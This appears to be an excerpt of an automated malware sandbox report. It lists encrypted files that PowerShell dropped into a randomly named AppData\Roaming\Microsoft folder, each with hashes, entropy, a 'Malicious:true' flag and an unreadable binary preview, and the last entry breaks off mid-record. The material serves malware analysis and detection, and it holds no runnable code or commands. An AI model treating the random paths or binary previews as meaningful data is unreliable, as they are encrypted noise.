                                                                                                    Preview: d.....Ihy4..n......v.;./...Pr...}..........Hzt.f.......@.k.&...........d...X...O.H$.......E.....+.i(..Bu..4..ocC).......dP...$......@6..F.1K-T...FD.?EC.......h.2....TN.vQ7...".Z.j...$H ...`...z.......3.T.....15.*..=.z.C....r:.%.D...r.oFJ.dr.O/..........+$z.ht#x.m.l....>.n....Y..kF3..)GZ..%A.T...<.. ..&O.?e.....E9.`.o..o].,......Kma.S..`..U.......oR{htj"............^g.D..eo.5.?.UT...S_m.%.J.,6...,..7......R.v`........C.n....Qe.,dM..0...;?.}...V9c..".].e@.$[..J.h.[...(..'..(.8...&BMU.....r/.d.,......S76]..e...lx#...P.$ng.U.4Z.X..,..I....$.0....A.......ud.>)Kv.34......b..{=...4...F..A.c.4...2$....g....8^..~..w2..z.rA..>...H....[(..7.*.I........]'.l..b.?.._...l9.O..^.h...2...1...]w.4N...^.3....(.&.......P..o.-`.'....2.\...P...W.....s%Q.zq..|...?...8l*E.?...`#k.&rM..4H$..B.6..C.....r.K..{.EXf....z....9.......vh...y.u.](........V?..8*c.....K.1 ....J.x..\......6....C.K......a.B...V.z..../p....i.T...3I}|.)%E......&...u...E..d.w.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uVKCciqjtJvy.TFqPXtdoYIius
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):158011
                                                                                                    Entropy (8bit):7.9987934801840925
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:w0ASZsLqAJEEtLnujgJrPAYJC3P+Gsf6VnWY943rMb26twgCtN8n9ugBW:whSZsLqA+EzujgJrPHJ2+obGbK25gCH1
                                                                                                    MD5:0E9942BA42A75FEEBBC1AB746E4496F2
                                                                                                    SHA1:91B703C26911D93FABDEADB0FBB546C0DC1D4186
                                                                                                    SHA-256:EC8DFB211F0B822BCFE1328C81C42B41209959AAD8879F5D654524B4C3CB1A8D
                                                                                                    SHA-512:BDF6C1D85600F773A10DF1952E174F3D49BA27C8FA06657E59F4E5E16D6CC3E7E5D0DCC9BDE3428712CB5D669D7B3222C437D54F6FF2772DBFE07D2AC7347272
                                                                                                    Malicious:true
                                                                                                    Preview: .G{...dK.7.=*.{"..q4........*.xx..E.....X.|..<..9,..-M....d!w..6M66.[...9Z.E..cgLKyf.KU@..K.7(....f...a......IY..+t#....V.QY.2R%..v..m0..Yt. ..}.H..R..$.1.b.....C...l.5%_..5.(.f.x.......VF@..~?...p:..R...m..9.)8...6.I......O....6..o`$..Y.\.c.a..+_f...YB..c.`.g.}..3.*.E).1.."...w...8F..-.,/..m.}..U...e .G..ZnO.L....E....[..5...k<.8.h.Ao..^..`.Z...4y._KKt...o....1.a.0..........C..-....d$h}#./..E.O.......M...H.........S.v....H......L.Gm..Cp......6.bPq:...N..m...c.D...I.M..1T.....SI9...8..8m.w.......m#..w\...p...!...O.Z.....I.L4.0.....k.O.S.. ..lxO|..p.,.......n....=....1.o8).S.te......%X...wh..N}...k.cI>..b.-<....O)j......+.P...k....T^d...o..g..M%..............S=.....#.....~Rm.L.......A.A..`..Y)W*SZ.....a..2E.{Y#7_[q.u.'...%(...Z....U.m...........U.......ny./V..4I~{.N..z.r./.,Y/c..."[.L..)....z.zS....k..UR.L...fv+'#..H.....t..G..f[D..>l2..d.....NdW........)..S....!..y....NH..e.Z^l.un.us.M..AH2.v..{.. (+O.z.L.7oAK,..j.tDo......2e`.h./LuJ
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uVhGKWRtUvIMNjdJqF.cejYkFwlDVmxGNdCX
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146143
                                                                                                    Entropy (8bit):7.998838377836333
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:JRPrLVI0K4Z1vUimzot9JtFEYeXr7qD2rqD6bAAxnakMlyn:PbBFkd71rsI
                                                                                                    MD5:70BE3D51DA2E3DE70C2F721C3EC05A43
                                                                                                    SHA1:162C729FB81906ADD8F06F2BFDC1A1757EB75C62
                                                                                                    SHA-256:32A46BE36D609FFFBDA7C02DD3F102BA99C3EAE231539A2EF6C72CDDD1C733F0
                                                                                                    SHA-512:8B241DAABAA97E7C72EBCD3FA7134B075D7400F5ECA036657F838F471FDBAF7B8CDBE3659AF9D386C9424BCFA627FFA300BE6B32E92FB26C0A3AB9E9FC241813
                                                                                                    Malicious:true
                                                                                                    Preview: }.u..C)..@.0#.F.".y...3....g....U.)....K................X.....AG..q.....W3.].@f.."....$.@.iA@.U......0..S..r.[.t:..0\"...8...M..V]...a94{U|.'v....6.:..8...]m`4..o.e....(.EWVx..H.7.WnhlOv'....!...q?.P.x..G....%s..;....?...a.$zN.P.h.4Y.\ .n...Y..%...FB...w...eiXv...tu.|9/.......k..{S&...N.b8.U..o..].W.X...<......O...L..&...%*$6Q....)."F.........mg..N...1.>..f..d...(.Y.O.R..=.Q....w.......;&..~3.......0.G....Z..8.E.}..\..'Y../.....^..T.7.O.m.F ....vor..IE.0...&....p~......vH.."..vR.&|..ZP.O.dF[...z...b.L.6.w.x./.r..+e.aBd..7........M.......55.....N....yKi.....R....1..i....1...&..3`.j8.8.....f.)..w.8)m.HX...>.+..m..&..1...M..-.E....f...VP.....^.Q._..(..`M./~"O.......y..h......m..h..>..Q...q.l....J.7,....y.VSz..i.`.s.....H..$..g.e~.....~.<..G.a*.e..>.p[..k.T.X.b......_}...p0(.V=.I.&y.(S~5.:b.....A...L..W.@.mCC....h.......CK)R.2Xf.p..:e!m...N<..%|..i.A..}.z.3:..]+..-..k.......E,.(.../.LJ....`..q..~O|...J..pv.4.&.H....Z..x..%..(.b.....#..E.q
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vOGKcUwLEnSaCDm.aSwbCHIFLxTVrXPJofN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):176325
                                                                                                    Entropy (8bit):7.998942162463424
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:3b4g0veyG+0iNN2FZaEhgmbZxcfA23mzxvWiNOs+FeMZBST1o:r4+yG+FN0bpDb7j7+A+hZBb
                                                                                                    MD5:EA628D0AFB6EF7D532AD08487DB77948
                                                                                                    SHA1:0BED8AC33908191AB902564EC81CF4B69E98EB10
                                                                                                    SHA-256:A2E92669A1EF76D11AF46C61D0888AD1D130A414CC321B65518E990DDBF00C83
                                                                                                    SHA-512:3EB066EE1B7DB9DFE0A206D5FDF5C86EE893B353420CB381209587F9F85DDF63702C089BA3960ED0369B5D59D86EB5F71FB252598A2D75283480C5511763EC24
                                                                                                    Malicious:true
                                                                                                    Preview: .7.7u4)...oB\.4.J.0-.._g.O.C ...F..4./q..8.BLy.Ov..1m..M;%M..4....9.L?..U..$.....m.....-...$...-..c.u.6P....K(.NRF....=v.do..c..^..sH*.6......D...>i..%<s..Sy*G....-.4.=*...+.......M..-o..:.k......4W..yT...........e. =..AW*v...)...\mR.b3.Z@xH..R.S.(....."*.......6./:k..M...,#..:..M...p7....O.....]%.@....y.`..K.7.m.].........dQ..........9OD.mH.9Y.sxbY...Kg......m..........D.Za...8I5{..U.gZ.X.@........._..r.......y..;.0..@.....Z...i%q.....wU<[.j.>.N...t.....I..}.$..Q._M.'..O."..L.[j...e..4B.&.J...7.L5.L..f...J.!.P.-tp...=F....h.....4.d....\A........x.1......b..6.5..q...wq.&..Em_U..2N.D.._H)..D..`..3....T..F)T.f..hK..b.Z.;.N....$O..+I..1.......?...z0..e......|....d.4..]...1..9...o.%Q..~yB.T...>.......O|..'FA.q./k^..,;#s.Q5.+QMw...]F...g..W2...#.O.<Z.O...<.N......8...2S.@.2R.V.n:K*/o+.[..r(}cfc.....B..!...B/.k.N....j...+N..b jnU...3NQXR..Bj.....!/..B.....:e!.O..D..zkm.|(|.<...3.;..d.czUn...}.......^...h...M;1"..n.~m+.....t..@S.:.XwC..6S.g!...n.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vSUOMWuGQYjsqoJ.WDPZrHmCNUlxvB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171320
                                                                                                    Entropy (8bit):7.999055455968372
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:lVWAKwc4z0G00O17NpWdnsm52Tx1/fcWd8CcTwkCaXTVq0+4ec/zPwyCh45F3dc:lVWAZO/17NURsNL3cM8KNaDVq0rwyw4K
                                                                                                    MD5:4D1D2222CBC50DCB29078D526C7487B0
                                                                                                    SHA1:D618378F192683839EC85811E74821638C332725
                                                                                                    SHA-256:0DDFAAF279037C03E05C13F8C88F16E14A82AF612322E8144BCD8E895987B8B7
                                                                                                    SHA-512:C9982485B4F90DE4CFD32F768CBEAE26A4DA52E92072B2838F5435069A71202EF91F9C1FC2CEFE86A99FF33C97709C040CF7B383B3D483913879DA1B43384B5F
                                                                                                    Malicious:true
                                                                                                    Preview: |......f|A-+T.j..Y.}[................ec......yG.. *W......#F...*D...<=6.a.7F8..n..y..+w...A.4.+....p....<&..}.........f_.d...,!.I.g......laL....%DJ<A.....b%.>...33....1..[..|I.....]Zv..K...-g..O..'jt..`..gDK.`1......_......-b.Nm:..A.6...2S.O..y.1.|..pY0..2..t.7..Q..)E.4l.A..d.T...gK..@[v...p..\.uj.7].......j`..e&8.3....G........PA.'.G."DZ.v.. .}.Vn...g.UU...:.X.jh..m.6dAt'4......lq2ut.?.J......@}m.8..[@}...WwO..........`.TD......~.kf.....FI....iz....t.A*...g...q..I*4.....$.u.6tN...I)<.....d.a...Pg.._VI.v.....'..^......,.H......m......n.=....8!.bR.S\)nL....,..).....'}DA..Xz.M....].V..I&...pg..V$pu:...-:....f.Ia.U..@........ h(..H.u(N{wv..".&..>..Q58+.X..%....V..}8.,;....}Y...g.....{...U|.1Z.%..".^.l.OC.*b:..5........ML..y..3b[../.vbj8[W1.}8.a2.3..$(.`.....-..../.Y..Tv2.k... ..w.jx.WX.of).C.JZ....j_..@.O...[..9+S7P..5..<*t..!T..t[3...8.........."H..o.KD..?Y|.2j....9..Y.z.V2...H*26"..]...l@.?.........1t......,Z.Ro.G..Gd...";.....l.....K..N@..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vWrcOxIVHuZie.sAUdchJQICyYnHRN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):158001
                                                                                                    Entropy (8bit):7.998788329059919
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:bltdb6Ef4hDeAaXFXWD0Z/SblBZQyX6Gu9mA+OH6pg/ZpV5hCCoFNY2Dhb:Ey49eX20Z/aTZQ5M1eRphKjPhb
                                                                                                    MD5:8FA3E7629774EC0D2AE2972B0EB0654C
                                                                                                    SHA1:B1701D69C23FC90810E34EFCBB60FA324A2EF955
                                                                                                    SHA-256:D62CB50DEE3A9EB386BB7ECED0AB1B6BF5F8FC72A83D47C187CB24202EAF6DAE
                                                                                                    SHA-512:C9F5B4509A4EC7CE9C281F8D517857BAE6E25C565F3A2F97A2EE70296D94A0A13F5249C237541F32CB51A26DE076AF25C5459EDAA9EEE3584662040CFD451375
                                                                                                    Malicious:true
                                                                                                    Preview: ......s...:N.C.u.a......E.%...K.D.....k.W..[n.............*.x..t..v.l.x......Y..!....v/...A$.E...:^w`...... ..Q.`....F..~....5....$...P..Y..{~s.....{.~&.J...C.(...Q.*;.......DxWj....G....].=rWY.=.."........P..."bpr...P...p......5.....(.ZYX..O..a4....Q.{E'....V..T..[..D.'..5!.ENS..c...-g.6De..,...P.....L*T...'..u..!...f..3..l8c(..z..._..KW....cF..........u.......K...P..|>t{ &]..?...JJG.....5. v3.O..G..M...Ny..M5e...@..z..l..[...<.z.MQ>...).../..k....1+..D...[....'..... ...<= ....>,...!....)#+\.k.r....r..?.{b#....l...K...I....O........B....<.../W.>..'...Cx..w^,..\..,..b.....J.o....pO.mA].%..~R.D+3Jc.y.AE...]........zM...?..4..UC......l..a....%cg!I..^+.\A[7....V.1.BJ.p..1k(.......-I...S+..^.W.~H1r...u....[Lb..,.2P(.t.9....D..........:6......42.$.U.......2vwpG...5.B....n........N<..Q.0...J.eL......b........d...}......a..f_'.........1.8.%`...k.......Ms...r...P.sZ...k...<.9.....).:=Qfn2.F{.}.b...*W.Pn.G....5.z.U[5.=K..d...........`.@..P........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\wrENkOBQTIilo.CmlqrIDdfswgS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57822
                                                                                                    Entropy (8bit):7.9969507804442035
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:SuZy5KIixmkSmaiL2B0tghHS89I0O9R4YppFuQS:Smy5KI11maiLv+YVp2
                                                                                                    MD5:D3F135041445B0291395776E21860A09
                                                                                                    SHA1:02F9109EFF1A7B2054F24D695B345602F7A0C185
                                                                                                    SHA-256:CA76109478A10DEB3F97F1E1128DBA7FA69F4A4005EED730404DD5D2E649D3C0
                                                                                                    SHA-512:08660F3FB675DE083D8367239615D0BC65A1B5299EB4E6BC98B682129323617484EB0554E18463A5AAAA24C044B26DC1ACB37A4DC3D2C81B139426B7EEB93445
                                                                                                    Malicious:true
                                                                                                    Preview: .."DR].;.....l*. lKWv......g...K`.T(`....q)l>PQ.. .v..*yU/.x!El..Y...A..e^.....X...z...\)....m.,.g.........?..Z.iPeHd.r.I.S7........XJ.\{...TB........^b.:...........W....~n...{.....HpJ..pQl.....x....p4..G.];.|.).....*Z...C.lMn.M}...h...(f......e.....x...s1.t..)..3V.)....R..n..D.)}...}...Qx/....M.Y.....%.k..E.k^p......W.^...4~r.....g&jWA.P.2z.Gu..."c*...yQ...!...;._ML.9,W|d..k..oM|.;...@..X...8H7..$......k..m:....\.......3..6X-....]Q...]U.-...y.^%.hA..q)..7.....>)..WT}...!.....P...+...%si....zI4d><.........a.2B............d...<...G.f....J...8.5D.t.32.S.O$"..wp;..y1/......Qn.._;cV..X5Q.Ixh...[Y..~.uDS:..$.G.o..E. ig..'d......x.r.......M...g..V.I;.....]9"....Oo\...|....oU.~.AoN.=..&........6..T[...Tz..L2.).Pu\.F.6m..T..x...d..I...a-.....;....fu.R:..c....Y..<,j..0..cH.'Rl........VPt)o......\.V]5l...7.;..69.9..z..SA..z.PP.QR..2[.....C..8.%N..>...z..n..9.H...wPS....,.LA.*..g.../?o.dy..+.........<...AB.w.f.y.x.7._[B....QA.4|.!_.H=P.D...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xASXwpkHaBguhUI.piQYzfyXZSBjntbV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):133481
                                                                                                    Entropy (8bit):7.998819062418321
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:y7vbGZvranKhMXsK6cBnFECjKy/GQYi9qjXVL3TKAbakGVluha:caZWKhMXsK6mFFjKyOW4Xl9Fylu0
                                                                                                    MD5:CED05DE27281F64CDF7604C290795A38
                                                                                                    SHA1:5891AAB66D82F36FDBD2DD0002DEE83216BE7C30
                                                                                                    SHA-256:09AD133080A1063316EE45D06793FED7A84888DDFD324955041F989CFF2F4741
                                                                                                    SHA-512:8D67D81542154D753FBDDCD53F74C83495D974D18CF1B0A2DD4CBD78ECB6A74F01B9BA6996D45D49A782FD946ED1E6848F172D21D22CAB41CB71C2754791786C
                                                                                                    Malicious:true
                                                                                                    Preview: .+......r.BN.!J..L.lAP..@.A.G..zE.S.........6.n,....CB...Zz.*.r.F.<|..p..O#.....6..6.4;..aM..yQf.2...t.u....P.....%...@}.........7..vr.D.F._hZv.|.A..*o..ea..#y6&RhBb..M.^.w..ZARY.L9.v.....v.".)B..\....C.t.o..|{[.,.*.....I.i..fcR2.?M....S.+P.....`,.*n.Q..H&a...\.I...oUr1L}...."..:J'.1..^.I.t#.T?u}9..."F..T.........T-9.....x.D..S..c....8.z...XU..!P.P....=<P..W=6.jm^.i..%.R/..#.}...H......7k.5z...th.[N+.s...x.=.:.9.B..z.N....9c...H..j83!..h@....%..b.qrV....|K..W.##......t.>5}...Et.P..Jp..]Hn......kbK......r...a#N.p...Q(...qE.(.V..~s.[..qOF.W...J^......:6..G]..T..S.U:...*.....hN.I..d8.U.Q.\jH.4....S...k..x.Z.c.......w.1G.S...._^..w.LU)KN.....?._.."z!t..m-.;.5.+....*ND.T...l~.=..|.f5.....^..I'd{iY.6?.......C2.H...}|BR...*.zz^...h......>p.C.,.]..].....o;.........\. ......%...C~....(..-)aZ+.._.e~...o.P4...Y.D.D;C!....um......2&x%..zb...}H.F....>Uyw..Ty..!.&......-.y-.....N%D..x.g.r.'.\+..P.Z*..gK.3..oo....I..7...L......&/Y\$!.vbvD..7..H:`Scy..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xUfXtzWvinO.cgBHhwNMiYqJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):130102
                                                                                                    Entropy (8bit):7.998509602720836
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:uEFPxYEEikAgr6xussei647PZUg/a65s5XM1svfx:uEVDg8uqixC0avfx
                                                                                                    MD5:549B5888CAC323ABFA07F7CB003F44A9
                                                                                                    SHA1:BC9C0610BD4C1C88BDD06683BAAB0F7E41B01111
                                                                                                    SHA-256:3E784468FC475420D9ECCCF7086FE75A726773ADB7AE9FC62EFFC8B23B6C6011
                                                                                                    SHA-512:1264BC8CF1FE58D383700CE314FC4A1AEF433FFE9DEF880D237A7904B2A292EC1B0D92CA96C28AACE1F96E51B6801592019DD682D907E7292D8D78BA8D29E0FB
                                                                                                    Malicious:true
                                                                                                    Preview: ....^].$.....@.h@5..y^\...]w...0......M..B....l..n..".$`.......#.X.oVV.v@6KG..N?u....R.0Xf...8........x.2.|...jT.._.`G.t.?..<]$..V.....A.T...~.VX.....0.R....~!.'..J.....<&....6%....y..y....W.VW..D..J....b+....X8.].1..Q.s1G..(.9......*.f."3.e.`[..{<..i.oI.[r....@.,..H]Qr.Z..HCt....[.eS....l`..q../q$2.I.....{.C..M.|.4,.qF.H.$Z.}E......GU...q$)f..#.Ih=..mRC.K.Hw...UT.@.4q...."....7.4....8.....$s...a0......ym0f.<.......P...|g.G.9..T......i..s.]...g..\.......-......&.....r.,....h.Y...W.0...<,>..A..v.K.`j%.......u.R.v".F....]E[e.J..&.Q..;ab....C..Lt=..^/...[...n.. .i...,;.":........K.......;-...=.A .....;.K...[Q.}<8..s....?Z...I6onc.:..a..'s../<.[..n..H ...YU.Od..(e.F<.r..O;..|........q...c.$<.L..Y.k.[.4-.D......J.....7;.u...U...@.6.E+Q.I,7...w..Hs$r.3w.?.6.....y.v...O..~....q.{........l.=-../....p$0.A3..s..K4.%}..s.O..j.{T..}W$.pm...(x..@...1.".3F.....`}9.9........B't...`2.#...#...6.o'.{K..)!.........v.....J.2..J{I3.8..W.g.t.F..2.v..D[AG...1z. `.V.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xXeNBRagpncOPSMt.TDpsAaYbwMldcU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55330
                                                                                                    Entropy (8bit):7.996343733133309
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:baMJjgi5n+Rbvp2nt5mc1GnBRcgOMwQmNagcYY+MaA1m:WMRz21m5D8BSg1wHVS+Mnm
                                                                                                    MD5:F55A6B6492EE351B59FD040C92FDBF57
                                                                                                    SHA1:7A1D5A2EA8F2C1EFF04FED10E79434F8560C77B3
                                                                                                    SHA-256:B51C9437850543A747B9A00570F51EA0F925812BC4947A9D56445C6B782FDBD9
                                                                                                    SHA-512:8B2E1BCBCB2C5B5776238B3B8FC88D24EF26A3012FBA493742EB49701233CD628490D541DA46E412595443EB83633F80B4FDF345E361941710C226A55717BE2B
                                                                                                    Malicious:true
                                                                                                    Preview: xGJJp..m..../?.%...T.I.....)H..2'aB...`.!k..a...}.w.s2/...&.$&......%.$.2z...3r/...d./..=...F....M.X.R$A.....n..YP|D.....{..3.]..%l.s.6?rwi.B....K....o..M...(J.I...F..'.i....F./..v.k.+....f...O.....2.V+...P.=!.k<....c...4...&..>.G...>@:cq.N..m.l.Z.%Z*..S.(..I...A.[..W..Jpd.N."..S....T......(.Y.F.0....|[.K..0...nOT...I.?.<"q.........*<....&....')..Y......(...MH.W...j.bah...}........~0.e.!.......,.C?...U.....<)..........AwP.Oo..3....O)......|w..s.`.}:.OD.e..&'.....6....J/]..:7...<SF.b..#.#...D...c=F..`.}.1*...=d..F-.,........-..!..G...}..~\.'.^Z....ZG:......B..[..H.u.2798..6Tz....a.......;...m...b!7H......^.....o.IK...GI.v-...A._...]O^...Jg...\cj..u....7r.D.>.!.I........Ad..E.z..Q.V..".....'..~.W.......]C....R.V'.../.F.<G.b.....'..E...H.F.wj .........9.*.rD./......48..c..B......./t.x. .26..G.0.G.G.dl...E.Z{M.K_.....(.kuga-........&.(..3..Q. ..oUW......W...H...S~...)`.N......t'..{-'.c.v3}.....$.....A.f......=....Q..p....xz..@...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xZriAtTWvpMqs.XszfobHxFKjBGr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):150329
                                                                                                    Entropy (8bit):7.99865516317756
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:n1BfbB0/Ip5p26/jwnlO1WeaSBoXcR8ar1oDoa4FAGEsQzc:XiKfklOojIoXYqD4E0
                                                                                                    MD5:4424A12B2E12F67B966DEFEC77E912AD
                                                                                                    SHA1:D138063AC812653B5CD7AF0111A081545C6A1FD0
                                                                                                    SHA-256:7350F1B3834984C31A41EC06CEDBB29B5DE9089CDCD4798D76CA542CB96AF5FE
                                                                                                    SHA-512:694B75EC0B035AC47773CE98669838D75451D4CDDDF33DEC2F187882AFDD62A43F6B2047C7E2BBF03DDC83ADFDC6EB664F9BC82F8BFDB3A3E702B4516AA7C15B
                                                                                                    Malicious:true
                                                                                                    Preview: ...).........m.........r....T...^.8.ti................P_y,..D.*......R2....WJ]....>.3h..g.=..C.V\q....LRGT.....`F.)..oW..X........i....Q.....j...H*..]]..F.(/..8.......Gz.d......h{.u.^'s..(.*..vji.q.v3.yD.-[}a.E.,...pii^.....s.?^,.y..G..Je..;..h_..\Z....]3..W.~..4...:uC.&.oF.l.c.....3^q]..@O..{..^......F..N..H...8...Z{.a..3$.K.....$..a....M..)....]VA..F...}.........n[..m..L...d......?..;.?7.T.0.gV.S..c..U2..b>z.....r]...Hb:~.7...5..J.].q.v/...Q.X...0...x;.....fE...7h.....O.........J!.;.>?.Jct.R9[C..4.)h1......`...F....n....~.[.c..!...O.O...m.e..0..Dk.B.'8\.+4..1F...... ...M...z...\.(Iu.QB..e...i.1..(2.QW./!....(w.0..v.0.}ZpYi.%oH7......f./-._l.9.h...eU4...v..q..^.`;!..~............"4....&3.v...}.....^...`".......,{,.OW...+.....1O6..]s`...h#....u.u.a...)..4>.'.!.Ax*.o..Z.6.x91..l......,........A.g..q..3g.g.X..........E-.............1}j(+]..L...V..y>.,...Sr.. ......@{...p\.........+.Z......?.S.C[....yz"<:....%...fui........U
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xguzsFEnXCV.eloCDkLIGYfQux
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77765
                                                                                                    Entropy (8bit):7.997638569107241
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HFZpt3p5cTzWILfe8wXm2jnfFmcaL81KG1BbnXxoBLmg1JsHF:lZp/5cfWifeDDjnfFVa41KG1BTK9hsl
                                                                                                    MD5:A744C2B8B8CF501E1E3F93618DD604B3
                                                                                                    SHA1:2A09C7FB444F40EBDD9D9C898EA59625517E4E21
                                                                                                    SHA-256:30B9B4511EE774F3600E569EBBE0CBAF40DAA0F6199496C5273C5E7BB759127B
                                                                                                    SHA-512:8888690DC209B3ECD43838582DCC92C633DA53B52D03BF7A46B0FFCD960F918EF37A5C8FAEDF4BB07F0FDF2ECFBBA99DBBAD53EE2E36A143AEFB705026EF0833
                                                                                                    Malicious:true
                                                                                                    Preview: h.....;.......>...$4d."C.....r...0...B'%K....P.z..Kt...x.Y.r"..H?.Qy......m^...'3.@+@.f(..R.....ChG............!...N..~......Hm^.6...[.....{k(.s7}.....t~......x}].M.....l.Q..#.|#N..Np.._..j......>2h...9.PD.z.1..../.:....D...w9...J...s..]\.%.9x....!......O.].ot.8'.[~...P..M.q..7.|..6...;..E..@..v.."&5....l'.<.4s'...U....0i.0~./|..V.;....gqt.T.m].F]^It.t:>.!..W.....&..o)IX@.\/c.~Y6&r..(..8y.o...v.6LQ.5.....J...!.......O6.F.&.U.z.H..9=..Vd...i...*s...+.....2...W..=XU..l...HFV.-...\..o.U..t=..%?....RQ..Gn?a.}.Fr..!Z.k...<|)]1.r..+......x..-....:w.`..yQ....D.0C....h.....%wP.0m.}"....C........m"...C._..;Z...[BE.v...h.>.....pF..9.Z:q......L.).Lu..R..H.M........N.....K];c.g.G652.H.....b.f...y.0........wM\.. D.j._....Va..lur.6h.6.u....r%.{w!.D......r.f8.0...........Uh.....'........)...:~...Z..5....i.O.(.......E..o...-..*@..d+...K.;..Q...1.5../.....`..W{$.2...K...).`..b...d....}..%...._...6Sb..0..G).......k`.`..p.I%X$d...<zZ..sT.cY...f....r..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xioUVAHDRBaSQOhqrEe.GJAgmouSfxi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53633
                                                                                                    Entropy (8bit):7.996920815619546
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:/9oVEWV3InPoHIfOVF8q/7/0vZKxaJVv+Amr6BDimRIlVN5Xtxak00BCPmnkK:/IV3+3Pq/7sRQYgt6VimRutxak00BpT
                                                                                                    MD5:B0ECD45F8DCD8BD009A4A7DF4B5BFD29
                                                                                                    SHA1:4CB9B76FC79FAF62866029F1786131405AD1A373
                                                                                                    SHA-256:D0FC44CECDC0F13965A7DBE3DDB7B20B07AB351A537BB3C4CE8171E3D89CCA11
                                                                                                    SHA-512:47A60EC4D5C52295D468D0784E3A59AFD2F332B24537E952050E6040067E5CFDC451098CA8096B92B48883EC5B546D38145F58A6E2E55C6438EB6DD3D40B3610
                                                                                                    Malicious:true
                                                                                                    Preview: ..i.....x.....8.!.,^#E.......o....+.h.g.E....R< ..aTwv.........,...Xi.e.Wf.../#.PO..s7........tB:..G..Jm....M1..".........Dq*T..].!l.9..:..hx..nh.....A...z....7[..-.E..u.:F}]..E...[..+.3.T....Aj.n;~}.$kN........G.L..d...K.......MM..Of....$........j!.9.kG.g.s.tQp...a..%S.e:.,qK...,Dw...7....H6.%...{mY..[Y...;V=...%,.?.BO.%.-P.z.`o.;.N0..y...L.I..j..8.8...........}..x.41.<{.8....(....}Y..p.~.r.s..[..u.y.\j.f...8.}q....T,.......8.h.p....9....&....G..a5.HT...1}<zJJ.Y.e....J7..,...-%2.'.?.X...P.u.xt..l..].lD.wob.TL%.~1.%.E..~...).Z.......:.[.Eb.d..^.G...&....-N...B......*.e.l....5.T..5.....e`-.qZ."w..+..<..e.yA....G.....:.q.U.~...[.(.p..#Z}.#.5...u..g.....xT..$..W.....jH...;.d...uG....-..k...7....n........W...TU..x....e.......j?.&..i._..c.o.C.....@.D.....WH...i..=1..ILI.y...^..Oy..X...U..N..'..R.......J....7U.P...`..K...........LO.....[..? S.$I,..+....82..j.Ev.j.M...).<.d~ym......C...90...c....$.} Qt.....%..W..N..eL........5.."H_...g..|
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xlJMWToIZkXsRyB.ayIRtvqOPVj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195664
                                                                                                    Entropy (8bit):7.999070958536488
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:+xyjp7HUnXqL3rgGvIHj5gFQoinc+ubOysQnBcYuV8220H7wJTNRkDy5Iv1gEcO:+xyj2ONa5UQoinc+unnIO0H7wJhRkT1P
                                                                                                    MD5:0BF5C267D627BB0E2C77BB9137EE5414
                                                                                                    SHA1:8BC6AA8F20F138D254CCA9407F3FECEA027A6DFE
